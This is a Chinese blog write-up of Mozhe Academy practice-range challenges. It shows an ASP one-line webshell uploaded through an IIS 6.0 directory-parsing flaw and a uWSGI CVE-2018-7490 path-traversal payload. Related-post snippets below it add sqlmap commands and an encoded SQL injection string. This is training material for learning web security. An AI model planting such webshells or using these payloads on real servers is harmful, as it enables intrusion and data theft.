墨者学院在线靶场WP

已于 2023-02-22 11:14:16 修改
阅读量903 收藏 2
点赞数 3
分类专栏: 笔记 文章标签: 安全 web安全 网络安全
于 2022-12-22 16:05:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Swaynie/article/details/128408645
版权
本文详述了多个网络安全领域的漏洞复现,包括内部文件上传系统漏洞、uWSGI CVE-2018-7490、Webmin远程代码执行、Ruby On Rails的CVE-2018-3760和CVE-2019-5418,以及X-Forwarded-For注入漏洞。通过过程和原理分析,深入理解这些安全问题。
摘要由CSDN通过智能技术生成

文章目录

一、内部文件上传系统漏洞分析溯源

过程

1.访问靶场
在这里插入图片描述
2.准备asp一句话木马

<%eval request("MH")%>

在这里插入图片描述
3.上传asp.txt,抓包,修改参数
在这里插入图片描述
4.放包,蚁剑连接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

原理

IIS6.0目录解析:
以*.asp命名的文件夹下,里面的文件都将会被当成ASP文件执行

二、uWSGI 漏洞复现(CVE-2018-7490)

过程

1.访问靶场

在这里插入图片描述
2.poc

/..%2F..%2F..%2F..%2F..%2Fkey.txt

在这里插入图片描述

原理

uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT

最低0.47元/天 解锁文章
Swaynie
关注
专栏目录
墨者学院-在线靶场
weixin_42730900的博客
02-23 4216
浏览器信息伪造 更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G ## 来源页伪造
墨者学院靶场练习
cndydmz的博客
12-06 1331
1.SQL注入漏洞测试(布尔盲注) 首先进入靶场, 然后点击上图通知,进入 然后打开sqlmap 输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名 得到数据库名为stormgroup 然后输入sqlmap -u http://219.153.49.228:45907/new_list.php...
墨者靶场SQL手工注入漏洞测试(MySQL数据库)通关思路
zyh1588的博客
11-01 1815
小白回顾墨者靶场sql手工注入
墨者靶场 SQL注入漏洞测试(报错盲注)通关思路
zyh1588的博客
11-01 470
小白回顾墨者靶场之sql报错注入
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1506
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
墨者靶场部分wp_logs
m0_58543272的博客
08-20 993
墨者靶场wp集合(努力更新中)
墨者学院在线靶场--网络安全
m0_59022585的博客
07-09 211
确定用户名和密码都为admin,进行登录得到提示进制登录,将插件X-Forwarded-For HeaderIP地址设置为127.0.0.1,再次登录得到key。进入超级链接,进行投票(只能投一次),使用插件X-Forwarded-For Header设置一个IP地址并进行投票,同时用Burp Suite.vbs抓包。使用Burp Suite.vbs进行爆破,再发送给服务器进行刷票(当IP不足时,可以更改前几位),再次登录可以得到key。打开Burp Suite.vbs,对超级链接进行抓包。
墨者学院 在线靶场 HTTP动作练习
weixin_60937978的博客
04-21 311
抓包 把GET改成POST,把中间的content剪切到末尾,去掉问号 bug zh 正确答案
墨者学院SQL手工注入靶场漏洞详解
sone_yoonyul的博客
07-07 1500
墨者学院SQL手工注入靶场漏洞详解目录靶场地址步骤详解 目录 靶场地址 该靶场墨者学院安全工程师“墨者”所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币(注册的时候会送十几个墨币并且不会重复消耗,只需要尽情练习即可),靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 步骤详解 观察首页,是否有注入入口 表单处无法进行注入,这时可以发现滚动栏有个通知,点开之后发现这是一
墨者学院 在线靶场 来源页伪造
weixin_60937978的博客
04-21 353
点击访问 利用bp抓包 修改为谷歌 进行放行 BUG↓↓ 正确答案
墨者靶场(综合)
曹振国的博客
06-20 2203
初级 综合表单暴力破解实训(第1题)提示:直接使用BurpSuite抓包跑数字HTML前端代码分析(暗链)提示:打开页面:访问得到key值:SVN信息泄露漏洞分析(第1题)背景介绍提示:1.使用dirsearch扫描地址2.使用Navicat Premium打开备份文件3.访问地址得到key值WEB页面源代码查看提示:F12看的key值 表单暴力破解实训(第1题) 提示: 直接使用BurpSuite抓包跑数字 成功拿到key HTML前端代码分析(暗链) 提示: 打开页面: 查看源码发现有一
墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)
qq_47271638的博客
05-07 717
墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。 此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。 然后查看哪个字段能显示出来 在URL后面联合查询 un
墨者学院;SQL手工注入;在线靶场;SQLsever;
xiaochenhang的博客
08-21 1266
object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限。syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。
墨者学院在线靶场writeup
john_david_的博客
02-14 5405
入门 WEB页面源代码查看 打开是一个HTML页面,鼠标右键被禁用,直接F12,控制台点Elements看源代码,就发现key了 WEB页面分析 打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key 服务器返回数据查看 F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key 浏览器信息伪造...
网络安全|墨者学院在线靶场|投票系统程序设计缺陷分析
没有
02-20 5304
网络安全|墨者学院在线靶场|投票系统程序设计缺陷分析
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现
qq_43233085的博客
01-21 1483
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
墨者靶场训练
weixin_45540609的博客
09-04 2464
一、request数据包格式 1.请求行:请求类型/请求资源路径、协议的版本和类型 2.请求头:一些键值对, 浏览器与 web 服务器之间都可以发送,特定的某种含义 3.空行:请求头与请求体之间用一个空行隔开; 4.请求体:要发送的数据(一般 post 提交会使用);例: user=123&pass=123 # Request Headers POST /adduser HTTP/1.1 Host: localhost:8030 Connection: keep-alive Content
墨者学院(4个sql靶场攻略)
最新发布
a96482的博客
07-23 1425
首先我们要购买并启动靶场点击访问跳转页面,获得KEY后在这里提交该题提示POST方式提交,我们需要通过burpsuite抓包在name后加单引号测试发现有sql注入,那我们就按照sql手工注入流程来这里发现联合注入(name='1 union select 1,2,3 #)直接得出KEY最后提交KEY完成。
墨者学院 靶场练习(一) SQL注入
a519395243的博客
12-20 8131
墨者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_42357070/article/details/81215715   进来点击公告   sqlmap 用于 mysql注入的步骤: 1:查找数据库 ./sqlmap.py ...
墨者学院sqlmap Host头注入
07-28
墨者学院SQLMap是一款常用的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。而Host头注入是一种特定类型的SQL注入攻击方法,攻击者通过修改HTTP请求头中的Host字段来执行恶意的SQL查询。 使用SQLMap进行Host头注入的步骤如下: 1. 首先,确认目标网站存在Host头注入漏洞。可以通过手动尝试修改Host字段并观察响应来确认漏洞存在与否。 2. 下载并安装SQLMap工具。可以从墨者学院的官方网站或GitHub仓库获取最新版本。 3. 执行命令`sqlmap -u "目标URL" --headers="Host: 注入点"`,其中目标URL是要测试的目标网站URL,注入点是漏洞存在的Host字段位置。 4. SQLMap将自动进行漏洞检测和注入测试,并生成相关报告和结果。 请注意,Host头注入是一种非常危险的攻击方法,仅限用于合法的安全测试目的。在未经授权的情况下使用该方法进行攻击是违法的,并可能导致法律后果。在进行任何安全测试之前,请确保获得合法授权并遵守适用的法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Swaynie

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值